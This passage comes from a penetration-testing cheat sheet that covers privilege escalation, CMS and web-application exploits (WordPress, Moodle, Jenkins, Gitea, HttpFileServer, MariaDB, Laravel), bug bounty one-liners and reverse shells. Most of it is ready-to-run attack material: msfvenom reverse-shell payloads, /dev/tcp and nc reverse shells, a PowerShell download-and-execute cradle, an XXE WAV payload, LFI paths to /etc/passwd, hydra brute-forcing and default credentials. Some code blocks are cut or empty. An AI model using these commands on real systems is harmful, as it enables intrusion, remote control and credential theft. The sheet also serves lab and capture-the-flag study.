https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/ 4217 | https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice.git 4218 | ``` 4219 | 4220 | ### Sequoia (CVE-2021-33909) 4221 | 4222 | ```bash 4223 | # Download 4224 | https://github.com/AmIAHuman/CVE-2021-33909 4225 | 4226 | # Usage 4227 | gcc exploit.c -o exploit 4228 | chmod +x exploit 4229 | ./exploit 4230 | 4231 | # References 4232 | https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909 4233 | https://github.com/AmIAHuman/CVE-2021-33909 4234 | ``` 4235 | 4236 | ### MariaDB (CVE-2021-27928) 4237 | 4238 | ``` 4239 | # Steps 4240 | 1. Set Payload 4241 | msfvenom -p linux/x64/shell/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f elf-so -o shell.so 4242 | 4243 | 2. Transfer to Target 4244 | curl 10.10.10.10/shell.so -o /tmp/shell.so 4245 | 4246 | 3. Listen 4247 | nc -lnvp 1234 4248 | 4249 | 4. Execute the payload 4250 | mysql -u root -p 4251 | SET GLOBAL wsrep_provider="/tmp/shell.so"; 4252 | 4253 | # References 4254 | https://github.com/Al1ex/CVE-2021-27928 4255 | ``` 4256 | 4257 | ### Gshadow (/etc/gshadow) 4258 | 4259 | ```bash 4260 | # Steps 4261 | -> Ensure /etc/gshadow is writable 4262 | -> Put current user to the sudo group 4263 | * sudo:*::username 4264 | -> newgrp sudo (login to sudo group) 4265 | -> sudo bash 4266 | 4267 | # References 4268 | https://nepcodex.com/2021/10/tranquil-writeup-hackmyvm-walkthrough/ 4269 | ``` 4270 | 4271 | ### Apache Struts CVE-2017-5638 4272 | 4273 | ```bash 4274 | # Commands 4275 | python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 4276 | 4277 | # Checking 4278 | python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 4279 | 4280 | # References 4281 | https://github.com/mazen160/struts-pwn 4282 | ``` 4283 | 4284 | # E. CMS/Web/Application 4285 | 4286 | ### Moodle 4287 | 4288 | ```bash 4289 | # Moodlescan 4290 | https://github.com/inc0d3/moodlescan 4291 | python3 moodlescan.py -u http://10.10.10.10/moodle 4292 | 4293 | # Manual Check version 4294 | http://10.10.10.10/moodle/composer.lock 4295 | 4296 | # Exploit 3.4.1 4297 | https://raw.githubusercontent.com/darrynten/MoodleExploit/master/MoodleExploit.php 4298 | -> php MoodleExploit.php url=http://10.10.10.10/moodle user=username pass=password ip=10.10.10.11 port=4444 course=2 debug=true 4299 | -> /*{a*/`$_GET[0]`;//{x}} 4300 | -> &0= 4301 | 4302 | 4303 | ``` 4304 | 4305 | ### Wordpress 4306 | 4307 | ```bash 4308 | # Wpscan 4309 | wpscan --url https://10.10.10.10/blog/ -e u,vp --disable-tls-checks 4310 | wpscan --url http://10.10.10.10/blog/ -e u --passwords rockyou.txt 4311 | wpscan --url http://10.10.10.10/ --usernames kwheel,bjoel --passwords rockyou.txt 4312 | 4313 | # Location 4314 | /wp-content/plugins/ 4315 | 4316 | # Default Credentials 4317 | admin:password 4318 | wordpress:wordpress 4319 | root:toor 4320 | 4321 | # Reverse Shell 4322 | ## Plugins 4323 | /dev/tcp/10.10.10.10/443 0>&1'"); 4335 | ?> 4336 | 4337 | - save as shell.php 4338 | - zip shell.zip shell.php 4339 | 4340 | # Manual Plugin Fuzing 4341 | -> Scraping All Plugins 4342 | -> curl -s -k http://plugins.svn.wordpress.org/ | grep -i href| grep -i li | cut -d"\"" -f2 > plugins.txt 4343 | 4344 | # Plugins Vulnerable 4345 | ##===CVE-2014-2383=== 4346 | - /wp-content/plugins/post-pdf-export/images/download-icon.png 4347 | - /dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd 4348 | - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ 4349 | 4350 | ##===CVE-2021-29447=== 4351 | 1. Create evil.dtd 4352 | 4353 | " > 4354 | 4355 | 2. Create payload.wav 4356 | echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00' > payload.wav 4357 | 4358 | 3. Host 4359 | php -S 0.0.0.0:80 4360 | 4361 | 4. Upload payload.wav to wordpress 4362 | 4363 | 5. Look at php server 4364 | - https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/ 4365 | ``` 4366 | 4367 | ### NibbleBlog 4368 | 4369 | ```bash 4370 | # Download Exploit Here 4371 | wget https://raw.githubusercontent.com/TheRealHetfield/exploits/master/nibbleBlog_fileUpload.py 4372 | 4373 | # Commands 4374 | #==Manual== 4375 | # Step 1: 4376 | - Go to http://10.10.10.10/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image 4377 | - Upload php reverse shell 4378 | # Step 2 4379 | - Listening 4380 | - Go to http://10.10.10.10/nibbleblog/content/private/plugins/my_image/image.php 4381 | ``` 4382 | 4383 | ### HTTPFileServer 4384 | 4385 | ```bash 4386 | # Links 4387 | - https://www.exploit-db.com/exploits/49125 4388 | * python3 exploit3.py 10.10.10.10 80 "c:\windows\system32\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.11/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.11 -Port 443" 4389 | * python3 exploit3.py 10.10.10.10 80 "C:\Users\kostas\Desktop\nc.exe -e cmd.exe 10.10.10.11 443" 4390 | - https://www.exploit-db.com/exploits/39161 4391 | * Change lhost,lport 4392 | - https://www.exploit-db.com/exploits/49584 4393 | * Change lhost,lport,rhost,rport (Depends windows version) 4394 | ``` 4395 | 4396 | ### Joomla 4397 | 4398 | ```bash 4399 | => Scanner 4400 | $ 4401 | 4402 | => References 4403 | $ https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website 4404 | $ https://www.exploit-db.com/docs/english/22763-guidelines-for-pentesting-a-joomla-based-site.pdf 4405 | ``` 4406 | 4407 | ### Drupal 4408 | 4409 | ```bash 4410 | # Scanner 4411 | ## drupwn 4412 | git clone https://github.com/immunIT/drupwn.git 4413 | python3 -m pip install -r requirements.txt 4414 | ./drupwn --target http://10.10.10.9/ --mode enum 4415 | 4416 | ##droopescan 4417 | droopescan scan drupal -u http://10.10.10.9/ 4418 | 4419 | # 7.x Exploit 4420 | https://www.exploit-db.com/exploits/41564 4421 | searchsploit -x php/webapps/44449.rb > exploit.rb 4422 | - ruby exploit.rb http://10.10.10.10./ --verbose 4423 | ``` 4424 | 4425 | ### Elastix 4426 | 4427 | ```bash 4428 | # Download 4429 | searchsploit -x php/webapps/18650.py > output.py 4430 | 4431 | # Usage 4432 | - Change lport 4433 | - Run 4434 | 4435 | # Lfi 4436 | /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action 4437 | ``` 4438 | 4439 | ### CMS Made Simple 4440 | 4441 | ```bash 4442 | # SQL Injection 4443 | https://www.exploit-db.com/exploits/46635 4444 | 4445 | # Usage 4446 | python exploit.py -u http://10.10.10.10/writeup 4447 | ``` 4448 | 4449 | 4450 | ### Umbraco 4451 | 4452 | ```bash 4453 | # Download 4454 | git clone https://github.com/noraj/Umbraco-RCE.git 4455 | 4456 | # Usage 4457 | python exploit.py -u 'user@email.com' -p 'password' -i http://10.10.10.10 -c powershell.exe -a 'whoami' 4458 | ``` 4459 | 4460 | ### PlaySMS 4461 | 4462 | ```bash 4463 | # Metasploit Module 4464 | use multi/http/playsms_uploadcsv_exec 4465 | ``` 4466 | 4467 | ### ThinVNC 4468 | 4469 | ```bash 4470 | # File Traversal - Better use burpsuite 4471 | - http://IP:PORT//../../ThinVnc.ini 4472 | ``` 4473 | 4474 | 4475 | ### Voting System 4476 | 4477 | ```bash 4478 | # File Upload RCE 4479 | https://www.exploit-db.com/exploits/49445 4480 | 4481 | # References 4482 | https://www.sourcecodester.com/php/12306/voting-system-using-php.html 4483 | ``` 4484 | 4485 | ### Osticket 4486 | 4487 | ```bash 4488 | # File location 4489 | /var/www/osticket/upload/include/ost_config.php 4490 | ``` 4491 | 4492 | ### SharePoints 4493 | 4494 | ```bash 4495 | # Wordlists 4496 | locate sharepoint | grep txt 4497 | /pathto/SecLists/Discovery/Web-Content/CMS/sharepoint.txt 4498 | /usr/share/dirb/wordlists/vulns/sharepoint.txt 4499 | /usr/share/wfuzz/wordlist/vulns/sharepoint.txt 4500 | /usr/share/windows-resources/powersploit/Recon/Dictionaries/sharepoint.txt 4501 | 4502 | # User Enumeration 4503 | http://example.com/_layouts/userdisp.aspx?id=1 4504 | http://example.com/_layouts/15/userdisp.aspx?id=1 4505 | http://example.com/site/path/_layouts/15/userdisp.aspx?id=1 4506 | http://example.com/site/path/_layouts/userdisp.aspx?id=1 4507 | 4508 | # Web Services 4509 | http://example.com/_vti_bin/spsdisco.aspx 4510 | 4511 | # References 4512 | https://hackingprofessional.github.io/HTB/Hacking-a-sharepoint-website/ 4513 | https://the-infosec.com/2017/04/18/penetration-testing-sharepoint/ 4514 | https://www.crummie5.club/the-lone-sharepoint/ 4515 | https://www.mdsec.co.uk/2020/03/a-security-review-of-sharepoint-site-pages/ 4516 | https://www.defcon.org/images/defcon-11/dc-11-presentations/dc-11-Shannon/presentations/dc-11-shannon.pdf 4517 | https://pentest-tools.com/public/sample-reports/sharepoint-scan-sample-report.pdf 4518 | https://trojand.com/cheatsheet/Methodologies/Sharepoint.html 4519 | http://sparty.secniche.org/ 4520 | https://hackmag.com/security/sharepoint-serving-the-hacker/ 4521 | https://github.com/helloitsliam/Hacking/blob/master/SharePoint-URLs 4522 | https://github.com/bhasbor/SharePointURLBrute-v1.1/blob/master/SharePoint-UrlExtensions-18Mar2012.txt 4523 | https://www.youtube.com/watch?v=aXFnO_PzaIw 4524 | ``` 4525 | 4526 | ### Rejetto File Server 4527 | 4528 | ```bash 4529 | # Exploit 4530 | https://www.exploit-db.com/exploits/39161 4531 | https://www.exploit-db.com/exploits/49584 4532 | 4533 | # Payload (UrlEncode) 4534 | # Execute File 4535 | ?search=%00{.exec%7Cwscript.exe%20//B%20//NOLOGO%20%25TEMP%25%5Cpayload.vbs.} 4536 | 4537 | # Payload (UrlDecode) 4538 | # Execute File 4539 | ?search= {.exec|wscript.exe //B //NOLOGO %TEMP%\payload.vbs.} 4540 | ``` 4541 | 4542 | ### Phreebooks 4543 | 4544 | ```bash 4545 | # PhreeBooks 5.2.3 ERP - Remote Code Execution 4546 | https://www.exploit-db.com/exploits/49524 4547 | https://www.exploit-db.com/exploits/46645 4548 | ``` 4549 | 4550 | ### Mremoteng 4551 | 4552 | ```bash 4553 | # Decrypt 4554 | https://github.com/gquere/mRemoteNG_password_decrypt 4555 | https://github.com/haseebT/mRemoteNG-Decrypt.git 4556 | 4557 | # Commands 4558 | python3 mremoteng_decrypt.py -s "" 4559 | ``` 4560 | 4561 | ### Webmin 4562 | 4563 | ```bash 4564 | # < 1.290 4565 | https://www.exploit-db.com/exploits/2017 4566 | ## Commands 4567 | perl exploit.pl 10.10.10.10 10000 /etc/passwd 0 4568 | ``` 4569 | 4570 | ### Jenkins 4571 | 4572 | ```bash 4573 | # Bruteforce hydra 4574 | hydra -l admin -P rockyou.txt 10.10.10.10 -s 30609 http-post-form 4575 | "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError" 4576 | 4577 | # Reverse shell (Linux) 4578 | r = Runtime.getRuntime() 4579 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 4580 | p.waitFor() 4581 | 4582 | ``` 4583 | 4584 | ### Gitea 4585 | 4586 | ```bash 4587 | # Location 4588 | /etc/gitea 4589 | 4590 | # Reverse Shell 4591 | - Choose one repo 4592 | - Go to Git Hooks 4593 | - Put reverse shell in contents of Post-receive 4594 | 4595 | #!/bin/bash 4596 | bash -i >& /dev/tcp/10.4.3.51/443 0>&1 4597 | 4598 | - git clone, git add . and git commit. 4599 | 4600 | # Database (Change Password) 4601 | sqlite3 database.db 4602 | select passwd from user; 4603 | select passwd_hash_algo from user; 4604 | select 4605 | 4606 | # Database (Change is_admin) 4607 | sqlite3 database.db 4608 | select id,name,is_admin from user; 4609 | update user set is_admin=1 where id=3; 4610 | ``` 4611 | 4612 | ### ES File Explorer Open Port Vulnerability (CVE-2019-6447) 4613 | 4614 | ```bash 4615 | => Download 4616 | $ https://www.exploit-db.com/exploits/50070 4617 | 4618 | => Commands 4619 | $ python3 exploit.py listApps 10.10.10.10 4620 | $ python3 exploit.py listFiles 10.10.10.10 4621 | $ python3 exploit.py listAppsSdcard 10.10.10.10 4622 | $ python3 exploit.py getDeviceInfo 10.10.10.10 4623 | $ python3 exploit.py listAppsPhone 10.10.10.10 4624 | $ python3 exploit.py listPics 10.10.10.10 4625 | 4626 | => References 4627 | $ https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566 4628 | ``` 4629 | 4630 | ### Strapi 4631 | 4632 | ```bash 4633 | # RCE 4634 | https://www.exploit-db.com/exploits/50239 4635 | => python3 exploit.py http://localhost/ 4636 | ``` 4637 | 4638 | ### Laravel 4639 | 4640 | ```bash 4641 | # Laravel Debug RCE (CVE-2021-3129) 4642 | https://github.com/zhzyker/CVE-2021-3129 4643 | => python3 exp.py http://localhost:8000/ 4644 | => To get reverse shell change `id` to any reverse shell 4645 | ``` 4646 | 4647 | # F. Bug Bounty 4648 | 4649 | ### Subdomain Methodology 4650 | 4651 | ```bash 4652 | # crt.sh (@vict0ni) 4653 | curl -k -s "https://crt.sh/?q=example&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u 4654 | 4655 | # Archive (@pikpikcu) 4656 | curl -s "http://web.archive.org/cdx/search/cdx?url=*.example.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u 4657 | 4658 | # References 4659 | https://reposhub.com/python/learning-tutorial/dwisiswant0-awesome-oneliner-bugbounty.html 4660 | ``` 4661 | 4662 | # G. Reverse Shell 4663 | 4664 | ### PowerShell 4665 | 4666 | ```powershell 4667 | # ConPtyShell (Interactive Powershell) 4668 | 4669 | ``` 4670 | 4671 | ### web.config (ASP) 4672 | 4673 | ```bash 4674 | 4675 | 4676 | 4677 | 4678 | 4679 | 4680 | 4681 | 4682 | 4683 | 4684 | 4685 | 4686 | 4687 | 4688 | 4689 | 4690 | 4691 | 4692 | 4700 | ``` 4701 | # References 4702 | - https://github.com/swisskyrepo/PayloadsAllTheThings 4703 | - https://book.hacktricks.xyz/ 4704 | - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 4705 | - https://zer1t0.gitlab.io/posts/attacking_ad/ 4706 | - https://pentestbook.six2dez.com/ 4707 | - https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/ 4708 | - https://github.com/vulhub/vulhub --------------------------------------------------------------------------------